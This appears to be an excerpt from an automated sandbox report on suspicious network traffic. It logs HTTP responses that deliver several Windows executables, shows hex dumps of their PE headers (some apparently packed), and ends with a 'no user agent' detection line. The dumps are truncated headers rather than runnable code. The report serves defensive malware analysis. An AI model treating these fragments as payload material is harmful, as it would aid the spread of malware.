Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 16:08:45 GMTContent-Type: application/octet-streamContent-Length: 1938944Last-Modified: Wed, 03 Jul 2024 15:31:31 GMTConnection: keep-aliveETag: "66856ed3-1d9600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 c0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4c 00 00 04 00 00 19 a4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 aa 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 aa 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 78 7a 65 71 72 77 6e 00 80 1a 00 00 30 32 00 00 7e 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 67 6f 61 68 78 6f 75 00 10 00 00 00 b0 4c 00 00 04 00 00 00 70 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4c 00 00 22 00 00 00 74 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 16:09:05 GMTContent-Type: application/octet-streamContent-Length: 2545664Last-Modified: Wed, 03 Jul 2024 15:01:11 GMTConnection: keep-aliveETag: "668567b7-26d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 84 8e bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 30 9d 00 7a 0e 00 00 9c 3e 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 b0 22 00 00 00 9d 00 00 a4 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
